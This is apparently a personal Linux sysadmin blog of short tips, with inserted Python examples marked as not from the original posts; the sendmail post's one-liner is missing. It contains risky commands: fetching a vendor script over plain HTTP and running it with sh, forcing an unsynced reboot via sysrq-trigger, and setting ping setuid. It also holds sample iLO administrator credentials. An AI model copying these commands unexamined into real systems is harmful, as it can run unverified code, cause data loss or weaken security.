ClamAV
December 16, 2019 — 15:14

Author: silver  Category: linux  Comments: Off

ClamAV is a decent anti-virus scanner for Linux. Unfortunately it does not run very well on low-memory systems (<1GB).

Running its database update tool, freshclam, can trigger the OOM killer. You will notice this when fetching the daily cdiffs keeps failing (see ‘dmesg’ and /var/log/clamdb). A cdiff carries only the differences from the previous database version instead of the full file, and the memory goes into applying these diffs to rebuild a whole cvd.

If there’s close to enough RAM you could try cgroups (or systemd), if those are available, or good old ulimit:

Edit /etc/cron.d/clamav-freshclam and replace what’s there with:

29 */1 * * *    clamav [ -x /usr/bin/freshclam ] && { ulimit -Sm 512000; ulimit -Sv 512000; ulimit -Hm 1024000; ulimit -Hv 1024000; /usr/bin/freshclam --quiet; } > /dev/null

But what if you’re on an embedded system or small VPS and there isn’t even close to 1GB of memory available?

Simple, just fetch the full cvd files instead. Note that wget’s -N (only download when the remote copy is newer) does nothing when combined with -O, so let wget write into the database directory itself rather than redirecting into the live file:

29 */1 * * *     clamav cd /var/lib/clamav && for i in bytecode.cvd daily.cvd main.cvd; do wget -N -q "http://db.local.clamav.net/$i"; done > /dev/null
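As an added example (not from the post), a small Python check to run after the download step: it parses the 512-byte CVD header, verifies that the MD5 recorded there matches the payload, and compares the version with the installed one, so a truncated or corrupted transfer over plain HTTP never replaces a good database. The MD5 only catches corruption; authenticity comes from the signature in the same header, which ClamAV checks when it loads the file. The sample CVD is constructed.

```python
"""Check a downloaded ClamAV .cvd before it replaces the installed one.

Added example, not from the original post. CVD layout per ClamAV:
a 512-byte ASCII header of colon-separated fields
  ClamAV-VDB:<build time>:<version>:<sigs>:<f-level>:<md5>:<dsig>:<builder>:<stime>
followed by the signature payload (a gzipped tar). <md5> covers the payload.
"""
import hashlib
from dataclasses import dataclass

HEADER_LEN = 512


@dataclass
class CvdHeader:
    build_time: str
    version: int
    signatures: int
    flevel: int
    md5: str
    builder: str


def parse_header(raw: bytes) -> CvdHeader:
    """Split the fixed-size header into fields; raise on anything unexpected."""
    if len(raw) < HEADER_LEN:
        raise ValueError("file shorter than a CVD header")
    text = raw[:HEADER_LEN].rstrip(b"\0 \n").decode("ascii")
    fields = text.split(":")
    if fields[0] != "ClamAV-VDB" or len(fields) < 8:
        raise ValueError("not a CVD header")
    return CvdHeader(build_time=fields[1], version=int(fields[2]),
                     signatures=int(fields[3]), flevel=int(fields[4]),
                     md5=fields[5].lower(), builder=fields[7])


def body_md5_ok(raw: bytes) -> bool:
    """True when the MD5 in the header matches the payload after it."""
    return hashlib.md5(raw[HEADER_LEN:]).hexdigest() == parse_header(raw).md5


def newer_than(raw: bytes, installed_version: int) -> bool:
    """True when the downloaded database is strictly newer than the installed one."""
    return parse_header(raw).version > installed_version


def safe_to_install(raw: bytes, installed_version: int) -> bool:
    """Combined gate: intact payload and a newer version number."""
    return body_md5_ok(raw) and newer_than(raw, installed_version)


def make_test_cvd(version: int, body: bytes) -> bytes:
    """Build a fake CVD (constructed test data, not a real database)."""
    fields = ["ClamAV-VDB", "16 Dec 2019 15-14 +0100", str(version), "1", "90",
              hashlib.md5(body).hexdigest(), "fake-dsig", "silver", "1576505640"]
    return ":".join(fields).encode().ljust(HEADER_LEN, b"\0") + body
```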

Password Managers
December 11, 2019 — 15:34

Author: silver  Category: encryption linux windows  Comments: Off

There are basically 3 categories to choose from, depending on where the service and the database live: local, “cloud”/SaaS, or self-hosted on-premise.

For single user/home usage KeePass is fine or perhaps even the password manager included in web browsers. Using one of the SaaS options such as LastPass adds ease of access.

For company/enterprise usage, sharing passwords in groups/teams should be supported, preferably with an on-prem option.

nftables
December 11, 2019 — 14:32

Author: silver  Category: linux network  Comments: Off

nftables (nft) replaces iptables:

  • Debian (10 buster) points ‘iptables’ at ‘iptables-nft’; the classic implementation is still available as ‘iptables-legacy’
  • RH uses nft as the preferred firewall since RHEL8, and firewalld uses nft as its backend

config

rules are located in:

  • Debian /etc/nftables.conf
  • RH /etc/sysconfig/nftables.conf

list

nft list ruleset

nft list chain ip filter INPUT

nft list tables

nft list table ip filter

flush

nft flush ruleset

more info

mergerfs
September 6, 2019 — 18:36

Author: silver  Category: linux storage  Comments: Off

A union filesystem (FUSE) like unionfs, aufs and mhddfs: it merges multiple paths into a single mount, similar to concatenating the drives.

Get it here: https://github.com/trapexit/mergerfs or from OS package repository.

Compared to (older) alternatives mergerfs seems very stable over the past months I’ve been using it. It offers multiple options on how to spread the data over the used drives.

Optionally SnapRAID can be used to add parity disk(s) to protect against disk failures (https://www.snapraid.it).

Create/mount pool

Example using 5 devices /dev/sd[b-f]

The disks are already partitioned and have a filesystem.

for i in {b..f}; do
  mkdir /mnt/sd${i}1
  mount /dev/sd${i}1 /mnt/sd${i}1 && \
  mkdir /mnt/sd${i}1/mfs
done && \
mkdir /mnt/mergerfs && \
mergerfs -o defaults,allow_other,use_ino /mnt/sd*/mfs /mnt/mergerfs

And here’s the result from ‘df’:

/dev/mapper/sdb1             3.6T  100M  3.5T  1% /mnt/sdb1
/dev/mapper/sdc1             3.6T  100M  3.5T  1% /mnt/sdc1
/dev/mapper/sdd1             3.6T  100M  3.5T  1% /mnt/sdd1
/dev/mapper/sde1             3.6T  100M  3.5T  1% /mnt/sde1
/dev/mapper/sdf1             3.6T  100M  3.5T  1% /mnt/sdf1
mergerfs                      18T  500M  8.5T  1% /mnt/mergerfs

Changing pool

remove old drive from mergerfs pool

xattr -w user.mergerfs.srcmounts -/mnt/data1 /mnt/pool/.mergerfs

add new drive

xattr -w user.mergerfs.srcmounts +/mnt/data4 /mnt/pool/.mergerfs

Some other mount options (-o):

  • use_ino make mergerfs supply inodes
  • fsname=example-name name in df
  • no_splice_write fixes page errors in syslog

https://github.com/trapexit/mergerfs#mount-options

Pool info

xattr -l /mnt/mergerfs/.mergerfs
# or:
mergerfs.ctl -m /mnt/mergerfs list values

mergerfs.ctl -m /mnt/mergerfs info

PowerShell
July 9, 2019 — 9:17

Author: silver  Category: dev linux windows  Comments: Off

I’ve been using PS for a while now and I don’t hate it anymore :) In fact I think it’s very usable for lots of tasks and automation.

Some Useful commands:

  • Get-Command *help* or Get-Command -Module PackageManagement
  • Get-Member to view properties e.g. Get-Disk | Get-Member
  • Get-Alias
  • Get-ExecutionPolicy -List
  • Set-ExecutionPolicy -ExecutionPolicy RemoteSigned
  • piping to select, sort and where
  • Invoke-WebRequest $url

CSV, XML and JSON support is included:

  • Import-CSV Export-CSV
  • ConvertTo-XML
  • ConvertFrom-Json ConvertTo-Json

And stuff like:

  • Logging sessions: Start-Transcript Stop-Transcript
  • Viewing Certificates: cd Cert:\ (now you can ‘dir’ etc)
  • Run as admin: powershell.exe -Command "Start-Process cmd -Verb RunAs"
  • PS Linting: https://github.com/PowerShell/PSScriptAnalyzer

Remote usage is also possible over WinRM (or OpenSSH):

  • Enter-PSSession -ComputerName <host>

Then there are loops, params, arrays and hash tables, e.g. foreach, Param([string]$arg), @() and @{}

More info:

Cgroups and NS
May 30, 2019 — 21:18

Author: silver  Category: linux  Comments: Off

Linux Control Groups and Namespaces

Used for limiting resource usage and for isolation.

Docs

Utils

  • lsns
  • nsenter
  • cgroup-tools pkg (cgget, cgset, …)

Network

  • ip netns list
  • ip netns identify <pid>
  • ip netns exec <netns> ip
  • or the shorthand: ip -n <netns> … (-n is short for -netns and equivalent to ip netns exec <netns> ip …)

Processes

  • ps axwww -o cgroup
  • ps axwww -o cgroup,user,pid,%cpu,%mem,vsz,rss,tname,stat,start,time,comm
  • ps axwww -o ipcns,mntns,netns,pidns,userns,utsns,pid,comm

Filesystem

  • /proc/<pid>/ns
  • /sys/fs/cgroup

Systemd

Vim linting
May 30, 2019 — 20:50

Author: silver  Category: dev linux  Comments: Off

Linting is basically making sure source code is correct.

For Vim there’s ALE: Asynchronous Lint Engine. It supports multiple tools like cpplint for C/C++, ShellCheck for shell scripts, phan for PHP etc etc.

Download

Get it here: https://github.com/w0rp/ale

Commands

  • ALELint
  • ALEEnable
  • ALEDisable
  • ALENext
  • ALEPrevious

.vimrc

To use Ctrl+j and Ctrl+k to move between errors:

nmap <silent> <C-k> <Plug>(ale_previous_wrap)
nmap <silent> <C-j> <Plug>(ale_next_wrap)

Zonemaster
December 8, 2018 — 17:52

Author: silver  Category: linux  Comments: Off

Zonemaster is an open-source DNS validation tool.

Source: https://github.com/zonemaster/zonemaster
Hosted: https://www.zonemaster.net/domain_check

Install Perl modules

Dependencies:

cpanm File::ShareDir File::Slurp Hash::Merge IO::Socket::INET6 List::MoreUtils Mail::RFC822::Address Module::Find Moose Net::IP Readonly::XS Text::CSV Devel::CheckLib

Zonemaster LDNS and Engine:

cpanm Zonemaster::LDNS
cpanm Zonemaster::Engine

Test

time perl -MZonemaster::Engine -e 'print map {"$_\n"} Zonemaster::Engine->test_module("BASIC", "zonemaster.net")'

Install Perl modules for the CLI

Dependencies:

cpanm MooseX::Getopt Text::Reflow Module::Install

Zonemaster CLI:

cpanm Zonemaster::CLI

Examples

zonemaster-cli --test basic zonemaster.net
zonemaster-cli --no-ipv6 --show_level --show_module --progress --level INFO --test Syntax example.com

GNU find
March 30, 2018 — 14:51

Author: silver  Category: linux windows  Comments: Off

Just a few useful ‘find’ examples

Exclude:

find . -path ./foo -prune -o -name bar -print
find /home \( -path /usr/data -prune -o -path /usr/src \) -prune -o -name foo -print
find . -name Makefile -not -path './foo/*'
find . -type d ! -regex '.*/\(foo\|bar\).*'

Permissions:

find . -perm -775
find . -perm /u+w,g+
find . -printf "%m:%f\n"
find . -printf "%m %h/%f\n"|grep -v '^\(644\|755\)'

Print date:

find -type f -printf '%TF %.8TT %p\n'

Windows:

find.exe . -name *.exe -exec certutil -hashfile {} SHA512 ; >c:\hash.txt

Updating CPU Microcode
March 28, 2018 — 12:50

Author: silver  Category: linux windows  Comments: Off

BITS

Tool from Intel called “BIOS Implementation Test Suite” that can do several things including handling microcode:
https://biosbits.org
https://github.com/biosbits/bits
https://github.com/mkorthof/bits

Linux

  • load/update microcode using pkg:
  • load/update intel microcode manually:
    – get latest tgz from intel: see below
    – backup/copy files: /lib/firmware/intel-ucode
    – check kernel config: grep MICROCODE /boot/config-*
    – run iucode_tool:
    /usr/sbin/iucode_tool -tb -lS /lib/firmware/intel-ucode/*
    – update initramfs: update-initramfs -u -k all
  • reloading microcode:
    echo 1 > /sys/devices/system/cpu/microcode/reload
    or: rmmod cpuid; modprobe cpuid
  • show version:
    dmesg | grep microcode or: grep microcode /proc/cpuinfo
  • skip loading microcode on boot:
    add to grub cmdline: dis_ucode_ldr

Windows

Microsoft includes certain CPU microcode updates in Windows updates. For example: KB4090007, KB3064209, KB2970215.

Get Microcode

Download the latest version from Intel:
https://downloadcenter.intel.com/download/27431/Linux-Processor-Microcode-Data-File?v=t.

Magic SysRq Key
November 25, 2017 — 22:19

Author: silver  Category: linux  Comments: Off

How to use SysRq (Print Screen key)

( “REISUB” )

enable (kernel.sysrq is a bitmask: 0 disables it, 1 enables every function, higher values enable only specific groups of functions, see the kernel doc linked below):

echo 1 > /proc/sys/kernel/sysrq

permanently:

/etc/sysctl.d/local.conf
kernel.sysrq=1

To BREAK on a serial console: CTRL+PAUSE

On a local console: ALT+SysRq+KEY

When logged in over SSH the same functions may be reachable by writing the key to /proc/sysrq-trigger:

echo s > /proc/sysrq-trigger

useful options:

  • b: Immediately reboot the system, without unmounting or syncing filesystems
    echo b > /proc/sysrq-trigger
  • e: Send the SIGTERM signal to all processes except init (PID 1)
  • f: Call oom_kill, which kills a process to alleviate an OOM condition
  • s: Sync all mounted filesystems
  • t: Output a list of current tasks and their information to the console
  • u: Remount all mounted filesystems in read-only mode
  • w: Display a list of blocked (D state) tasks
  • space: Print a summary of available magic SysRq keys

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/plain/Documentation/admin-guide/sysrq.rst
https://en.wikipedia.org/wiki/Magic_SysRq_key

GoAccess
November 25, 2017 — 18:04

Author: silver  Category: linux web  Comments: Off

GoAccess is a “real-time web log analyzer” which can output to the CLI or to HTML (like webalizer, awstats, piwik etc). It works out of the box with Apache; for lighttpd you probably need to specify the log format. The examples below are for lighttpd. Run “goaccess /var/log/httpd/access.log” without any other arguments and it will ask for the log format and drop you into the dashboard (text-based GUI).

CLI

no conf, just arguments:

goaccess /var/log/lighttpd/access.log \
--date-format=%d/%b/%Y \
--time-format='%T %z' \
--log-format='%h %v %e [%d:%t] "%r" %s %b "%R" "%u"'

-or-

change /etc/goaccess.conf:

date-format %d/%b/%Y:%T %z
log-format %h %v %e [%d] "%r" %s %b "%R" "%u"
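As an added example (not part of the post or of GoAccess), the following Python turns the lighttpd --log-format string above into a regex, parses a few constructed log lines, and reproduces what -e <host> and --ignore-crawlers do, so you can see exactly which field each %-token captures before trusting the dashboard numbers. The crawler heuristic is a constructed stand-in for GoAccess’s own list.

```python
"""Compile a GoAccess --log-format string into a regex and summarise a log.

Added example, not from the post and not GoAccess code. It handles only the
tokens used in the lighttpd format above and imitates "-e <host>" and
"--ignore-crawlers"; the crawler heuristic is a constructed stand-in for
GoAccess's own list. Sample lines are constructed.
"""
import re
from collections import Counter

LOG_FORMAT = '%h %v %e [%d:%t] "%r" %s %b "%R" "%u"'

# %-token -> (group name, pattern); patterns are kept narrow so malformed lines are rejected
TOKENS = {
    "h": ("host", r"\S+"),        # client address
    "v": ("vhost", r"\S+"),       # server name
    "e": ("user", r"\S+"),        # authenticated user or "-"
    "d": ("date", r"[^:\]\s]+"),  # %d/%b/%Y, stops at the ':' before the time
    "t": ("time", r"[^\]]+"),     # %T %z, runs to the closing bracket
    "r": ("request", r'[^"]*'),   # request line
    "s": ("status", r"\d{3}"),
    "b": ("bytes", r"\S+"),       # may be "-"
    "R": ("referer", r'[^"]*'),
    "u": ("agent", r'[^"]*'),
}
CRAWLER_HINT = re.compile(r"bot|crawl|spider", re.IGNORECASE)


def compile_format(fmt):
    """Turn '%h %v ...' into an anchored regex with one named group per token."""
    out, i = [], 0
    while i < len(fmt):
        if fmt[i] == "%" and i + 1 < len(fmt) and fmt[i + 1] in TOKENS:
            name, pat = TOKENS[fmt[i + 1]]
            out.append(f"(?P<{name}>{pat})")
            i += 2
        else:
            out.append(re.escape(fmt[i]))
            i += 1
    return re.compile("^" + "".join(out) + "$")


def parse_line(pattern, line):
    """Dict of fields for one log line, or None when it does not match the format."""
    m = pattern.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def summarize(lines, exclude_hosts=(), ignore_crawlers=False):
    """Hits per HTTP status after dropping excluded hosts and, optionally, crawlers."""
    pattern = compile_format(LOG_FORMAT)
    counts = Counter()
    for line in lines:
        rec = parse_line(pattern, line)
        if rec is None or rec["host"] in exclude_hosts:
            continue
        if ignore_crawlers and CRAWLER_HINT.search(rec["agent"]):
            continue
        counts[rec["status"]] += 1
    return counts


SAMPLE_LOG = [
    '203.0.113.5 example.com - [25/Nov/2017:18:04:01 +0100] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
    '127.0.0.1 example.com - [25/Nov/2017:18:04:02 +0100] "GET /status HTTP/1.1" 200 12 "-" "curl/7.52.1"',
    '198.51.100.7 example.com - [25/Nov/2017:18:04:03 +0100] "GET /robots.txt HTTP/1.1" 404 0 "-" "Googlebot/2.1"',
    '203.0.113.5 example.com - [25/Nov/2017:18:05:10 +0100] "POST /login HTTP/1.1" 401 0 "http://example.com/" "Mozilla/5.0"',
]
```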

HTML

Output to “static” html file.

current log:

goaccess /var/log/lighttpd/access.log \
  --date-format=%d/%b/%Y \
  --time-format='%T %z' \
  --log-format='%h %v %e [%d:%t] "%r" %s %b "%R" "%u"' \
  --output=/var/www/html/goaccess.html

use all logs:

zcat -f /var/log/lighttpd/access.log*gz | goaccess \
  --date-format=%d/%b/%Y \
  --time-format='%T %z' \
  --log-format='%h %v %e [%d:%t] "%r" %s %b "%R" "%u"' \
  --ignore-crawlers \
  --with-output-resolver \
  -e 127.0.0.1 -e ::1 -e exclude.example.com \
  --output=/var/www/html/goaccess.html

Server

The last option is to run it as a server using WebSockets. This allows it to:

  • output realtime HTML: --real-time-html
  • run as daemon: --daemonize
  • use FIFO: --fifo-in= --fifo-out=
  • use HTTPS: --ssl-cert= --ssl-key= --ws-url=wss://url

live log:

goaccess /var/log/lighttpd/access.log \
 --date-format=%d/%b/%Y \
 --time-format='%T %z' \
 --log-format='%h %v %e [%d:%t] "%r" %s %b "%R" "%u"' \
 --output=/var/www/html/goaccess.html \
 --real-time-html \
 --ssl-cert=/etc/ssl/certs/cert.pem \
 --ssl-key=/etc/ssl/private/privkey.pem --ws-url=wss://example.com:7890

Now https://example.com/goaccess.html should show a live dashboard (TCP port 7890 needs to be reachable by the client).

perf
August 23, 2017 — 16:45

Author: silver  Category: linux  Comments: Off

perf – performance analysis tools for Linux

Start with:

perf top
perf bench all

Example:

To find out why “kworker” process (kernel per-cpu threads) has high CPU usage:

  • record 10 seconds of backtraces on all CPUs to perf.data:
    perf record -g -a sleep 10
  • analyse recording:
    perf report

More info:
https://www.brendangregg.com/perf.html
https://askubuntu.com/questions/33640/kworker-what-is-it-and-why-is-it-hogging-so-much-cpu

Debian
August 23, 2017 — 15:37

Author: silver  Category: linux  Comments: Off

Remote upgrade using aptitude:

  1. echo "defscrollback 10000" >>/root/.screenrc
  2. screen
  3. /etc/sysctl.conf:
    # reboot 600s after a kernel panic
    kernel.panic = 600
    # enable magic sysrq key
    kernel.sysrq=1
  4. In /etc/apt/sources.list: change old to new dist (or “stable” etc)
    ( if needed: apt-get install debian-archive-keyring )
  5. aptitude update
  6. aptitude safe-upgrade
    ( optionally/if needed: full-upgrade, dist-upgrade )

Change default editor:

sudo update-alternatives --config editor

Install build tools:

apt-get install build-essential

pkg install dates:

for file_list in $(ls -rt /var/lib/dpkg/info/*.list); do \
  stat_result=$(stat --format=%y "$file_list"); \
  printf "%-50s %s\n" "$(basename "$file_list" .list)" "$stat_result"; \
done

backports:

apt-get -t stretch-backports install "package"
aptitude -t stretch-backports install "package"

/etc/apt/preferences:

Package: *
Pin: release a=stable
Pin-Priority: 900

Package: *
Pin: release o=Debian
Pin-Priority: -10

“testing” packages (the same works for stable, unstable, oldstable, etc.):

install a pkg from testing:

sudo apt-get -t testing install tmux

show all installed testing pkgs:

aptitude search -F "%p %V %v" '?narrow(~i, ~Atesting)'

apt-get install package=version

ping
March 4, 2017 — 16:01

Author: silver  Category: linux  Comments: Off

When trying to ping as non root user you might get the following error:

ping: icmp open socket: Operation not permitted

There are several ways to fix this:

reinstall pkg (debian):

$ sudo apt-get install --reinstall iputils-ping

(the package postinst applies the file capability again)

manually set cap:

$ sudo setcap cap_net_raw+ep /bin/ping
$ sudo setcap cap_net_raw+ep /bin/ping6
$ sudo getcap /bin/ping
$ sudo getcap /bin/ping6

File capabilities are stored as extended attributes, so the kernel needs xattr security support for the filesystem, e.g. for ext4:
CONFIG_EXT4_FS_SECURITY=y

don’t use SOCK_RAW: a ping that opens an ICMP datagram socket instead needs no capability at all (subject to ping_group_range below):

socket(PF_INET, SOCK_DGRAM, IPPROTO_ICMP)

$ cat /proc/sys/net/ipv4/ping_group_range
$ sysctl net.ipv4.ping_group_range

  • “1 0” default, nobody except root (an empty range)
  • “100 100” a single group
  • “0 2147483647” everyone (max gid)

$ sysctl -w net.ipv4.ping_group_range="0 2147483647"

/etc/sysctl.d/local.conf
net.ipv4.ping_group_range=0 2147483647

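As an added example (not from the post), Python that exercises the unprivileged path: it evaluates a ping_group_range value against a set of gids, builds an ICMP echo request (type 8) with a correct checksum, and sends it over socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP), the socket type that needs neither CAP_NET_RAW nor a setuid binary. ping_once needs network access; the other helpers are pure functions.

```python
"""Unprivileged ICMP echo over SOCK_DGRAM plus the ping_group_range check.

Added example, not from the post. socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP)
needs neither CAP_NET_RAW nor a setuid binary; the kernel only requires one
of the caller's gids to lie inside net.ipv4.ping_group_range, an inclusive
"low high" pair ("1 0", the default, is empty). On this socket type the
kernel fills in the ICMP identifier itself, so the sender supplies only
type, code, sequence, payload and checksum.
"""
import errno
import socket
import struct
import time

PING_GROUP_RANGE = "/proc/sys/net/ipv4/ping_group_range"


def parse_range(text):
    """'0 2147483647' -> (0, 2147483647)."""
    low, high = text.split()
    return int(low), int(high)


def gid_allowed(range_text, gids):
    """True if any gid lies inside the inclusive range; '1 0' allows nobody."""
    low, high = parse_range(range_text)
    return low <= high and any(low <= g <= high for g in gids)


def inet_checksum(data):
    """RFC 1071 one's-complement sum over 16-bit words (odd length is zero-padded)."""
    if len(data) % 2:
        data += b"\0"
    total = sum(int.from_bytes(data[i:i + 2], "big") for i in range(0, len(data), 2))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def icmp_echo_request(seq, payload=b""):
    """Type 8, code 0 echo request; id is left 0 because the kernel overwrites it."""
    header = struct.pack("!BBHHH", 8, 0, 0, 0, seq)
    csum = inet_checksum(header + payload)
    return struct.pack("!BBHHH", 8, 0, csum, 0, seq) + payload


def open_ping_socket():
    """(socket, '') on success, (None, errno name) when the range excludes us."""
    try:
        return socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_ICMP), ""
    except OSError as e:
        return None, errno.errorcode.get(e.errno, str(e.errno))


def ping_once(host, timeout=1.0):
    """Send one echo request; return the round-trip time in seconds or None."""
    sock, err = open_ping_socket()
    if sock is None:
        raise PermissionError(f"ICMP datagram socket refused ({err}); see {PING_GROUP_RANGE}")
    try:
        sock.settimeout(timeout)
        pkt = icmp_echo_request(seq=1, payload=b"silver")
        start = time.monotonic()
        sock.sendto(pkt, (host, 0))
        reply, _ = sock.recvfrom(1024)  # ICMP message only; no IP header on this socket type
        if reply[0] == 0 and reply[6:8] == pkt[6:8]:  # type 0 = echo reply, same sequence
            return time.monotonic() - start
        return None
    except socket.timeout:
        return None
    finally:
        sock.close()
```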
suid (last resort: unlike the single capability above, the whole binary then runs as root):

chmod +s /bin/ping
chmod +s /bin/ping6

Linux Audit
March 4, 2017 — 15:43

Author: silver  Category: linux  Comments: Off

First make sure “auditd” is started

add rules:

auditctl -a always,exit -S all -F path=/etc/passwd -F key=config1
auditctl -w /etc/passwd -p rwa -k config2

del rules:

auditctl -d always,exit -S all -F path=/etc/passwd -F key=config1
auditctl -W /etc/passwd -p rwa -k config2

(or restart auditd)

make permanent:

add rules to /etc/audit/rules.d/audit.rules

show results:

ausearch -ts today -k config1
aureport -k
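As an added example (not from the post), a small Python reader for raw /var/log/audit/audit.log records that groups them into events by serial and filters on the rule key, roughly what ausearch -k config2 does, plus a constructed triage rule flagging a logged-in user (auid) who touched the file as root. The log records are constructed.

```python
"""Group raw audit.log records into events and filter on the rule key.

Added example, not from the post. Record format written by the kernel:
  type=<TYPE> msg=audit(<epoch>.<ms>:<serial>): k1=v1 k2="quoted v2" ...
Every record of one event shares the serial, so a SYSCALL line and its
PATH/CWD lines are merged here. The sample records below are constructed.
"""
import re

RECORD_RE = re.compile(
    r'^type=(?P<type>\S+) msg=audit\((?P<ts>[\d.]+):(?P<serial>\d+)\):\s*(?P<rest>.*)$')
FIELD_RE = re.compile(r'(\w+)=("([^"]*)"|\S+)')


def parse_record(line):
    """One line -> (serial, type, timestamp, {field: value}) or None if not an audit record."""
    m = RECORD_RE.match(line.strip())
    if not m:
        return None
    fields = {}
    for key, raw, quoted in FIELD_RE.findall(m.group("rest")):
        fields[key] = quoted if raw.startswith('"') else raw
    return m.group("serial"), m.group("type"), float(m.group("ts")), fields


def group_events(lines):
    """Merge all records sharing a serial; SYSCALL fields win, PATH names are collected."""
    events = {}
    for line in lines:
        parsed = parse_record(line)
        if parsed is None:
            continue
        serial, rtype, ts, fields = parsed
        ev = events.setdefault(serial, {"serial": serial, "time": ts, "paths": []})
        if rtype == "SYSCALL":
            ev.update(fields)
        elif rtype == "PATH" and "name" in fields:
            ev["paths"].append(fields["name"])
    return list(events.values())


def events_for_key(lines, key):
    """Events produced by the rule tagged -k <key>, like 'ausearch -k <key>'."""
    return [ev for ev in group_events(lines) if ev.get("key") == key]


def suspicious(ev):
    """Constructed triage rule: a real login (auid set) acting on the file as root (uid 0)."""
    return ev.get("auid") not in (None, "0", "4294967295") and ev.get("uid") == "0"


SAMPLE_AUDIT_LOG = [
    'type=SYSCALL msg=audit(1488642180.217:512): arch=c000003e syscall=257 success=yes exit=3 '
    'items=1 ppid=2001 pid=2044 auid=1000 uid=0 gid=0 euid=0 tty=pts0 ses=3 '
    'comm="vi" exe="/usr/bin/vi" key="config2"',
    'type=CWD msg=audit(1488642180.217:512): cwd="/root"',
    'type=PATH msg=audit(1488642180.217:512): item=0 name="/etc/passwd" inode=1310 '
    'dev=fd:01 mode=0100644 ouid=0 ogid=0 nametype=NORMAL',
    'type=SYSCALL msg=audit(1488642200.005:513): arch=c000003e syscall=257 success=no exit=-13 '
    'items=1 ppid=1800 pid=1822 auid=1000 uid=1000 gid=1000 euid=1000 tty=pts1 ses=4 '
    'comm="bash" exe="/bin/bash" key="config2"',
    'type=PATH msg=audit(1488642200.005:513): item=0 name="/etc/passwd" nametype=NORMAL',
    'type=USER_LOGIN msg=audit(1488642300.000:514): pid=1900 uid=0 auid=1000 ses=5 res=success',
]
```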

stop audit messages from also being copied into the journal (auditd keeps writing to /var/log/audit):

systemctl mask systemd-journald-audit.socket

HP ProLiant
December 9, 2016 — 21:54

Author: silver  Category: linux other  Comments: Off

Boot:

  • BIOS: F10
  • HP SSA Smart Storage Administrator / ACU Array Configuration Utility: F5
  • ORCA / Options ROM for Configuring Arrays: Press any key…, F8
  • HP IP: F10
  • Boot Menu: F11

Install HP software:

Repository:

wget http://downloads.linux.hp.com/add_repo.sh
sh add_repo.sh spp -d redhat -r 6.7 -n
sh add_repo.sh spp -d redhat -r 6.7
sh add_repo.sh spp -d redhat -r 5.10 -n
sh add_repo.sh spp -d redhat -r 5.10
sed -i 's/gpgcheck=0/gpgcheck=1/' /etc/yum.repos.d/HP-spp.repo
rpm --import http://downloads.linux.hp.com/SDR/hpPublicKey1024.pub
rpm --import http://downloads.linux.hp.com/SDR/hpPublicKey2048.pub
rpm --import http://downloads.linux.hp.com/SDR/hpPublicKey2048_key1.pub
for i in $( rpm -qa gpg-pubkey* ); do rpm -qi $i |grep -B 8 Hewlett; done
yum install hpacucli
yum install hponcfg

HP Server Management Application and Agents Command Line Interface

# hpasmcli -s "clear iml"

HP Lights-Out Online Configuration Utility for Linux

hponcfg -f Clear_EventLog.xml -i

Clear_EventLog.xml:

<RIBCL VERSION="2.0">
  <LOGIN USER_LOGIN="Administrator" PASSWORD="xxx">
  <RIB_INFO MODE="write">
    <CLEAR_EVENTLOG/>
  </RIB_INFO>
  </LOGIN>
</RIBCL>

Clear_IML.xml:

<RIBCL VERSION="2.0">
  <LOGIN USER_LOGIN="Administrator" PASSWORD="xxx">
  <SERVER_INFO MODE="write">
    <CLEAR_IML/>
  </SERVER_INFO>
  </LOGIN>
</RIBCL>

Administrator_reset_pw.xml:

<ribcl VERSION="2.0">
 <login USER_LOGIN="Administrator" PASSWORD="boguspassword">
  <user_INFO MODE="write">
   <mod_USER USER_LOGIN="Administrator">
    <password value="NewPass123"/>
   </mod_USER>
  </user_INFO>
 </login>
</ribcl>

gnome-keyring
November 26, 2016 — 17:52

Author: silver  Category: linux  Comments: Off

Restart:

gnome-keyring-daemon -r -d

If that doesn’t suffice, these extra steps might help:

pgrep -f gnome-keyring-daemon
rm -rf ~/.cache/keyring-*
setsid /usr/bin/gnome-keyring-daemon > /dev/null 2>&1
ln -s ~/.cache/keyring-* $GNOME_KEYRING_CONTROL
/usr/bin/gnome-keyring-daemon --start --components=pkcs11
/usr/bin/gnome-keyring-daemon --start --components=gpg
/usr/bin/gnome-keyring-daemon --start --components=ssh
find ~/.cache/ -maxdepth 1 -type l -name 'keyring-*' -delete

sendmail with attachment
November 26, 2016 — 17:48

Author: silver  Category: linux  Comments: Off

One-liner to send an email with an attachment using sendmail, using these variables:

$S Subject
$B Body
$A Attachment
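As an added example (not the post’s one-liner), the same job in Python using only the standard library: build a multipart message with the subject, body and attachment from $S, $B and $A, then pipe it to sendmail -t -i. The sendmail path is an assumption.

```python
"""Send a mail with one attachment through the local sendmail binary.

Added example, not the post's one-liner. Subject ($S), body ($B) and
attachment ($A) become function parameters; the MIME structure comes from
the standard library and is piped to "sendmail -t -i", which takes the
recipients from the headers. SENDMAIL is an assumed path.
"""
import mimetypes
import os
import subprocess
from email.message import EmailMessage

SENDMAIL = "/usr/sbin/sendmail"  # assumed; adjust for your MTA


def build_message(sender, recipient, subject, body, attachment_path, data=None):
    """Return an EmailMessage; pass data=bytes to avoid reading attachment_path."""
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = recipient
    msg["Subject"] = subject
    msg.set_content(body)
    if data is None:
        with open(attachment_path, "rb") as f:
            data = f.read()
    ctype, _ = mimetypes.guess_type(attachment_path)
    maintype, subtype = (ctype or "application/octet-stream").split("/", 1)
    msg.add_attachment(data, maintype=maintype, subtype=subtype,
                       filename=os.path.basename(attachment_path))
    return msg


def send(msg):
    """Pipe to sendmail: -t reads recipients from the headers, -i keeps a lone '.' from ending input."""
    subprocess.run([SENDMAIL, "-t", "-i"], input=msg.as_bytes(), check=True)


def send_with_attachment(sender, recipient, subject, body, attachment_path):
    """The one-call equivalent of the post's one-liner ($S, $B, $A)."""
    send(build_message(sender, recipient, subject, body, attachment_path))
```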


Display man pages as text
November 26, 2016 — 15:51

Author: silver  Category: linux  Comments: Off

man openssl | cat
man -P cat openssl
groff -t -e -mandoc -Tascii manpage.1 | col -bx > manpage.txt

Linux Disk Encryption
November 26, 2016 — 13:04

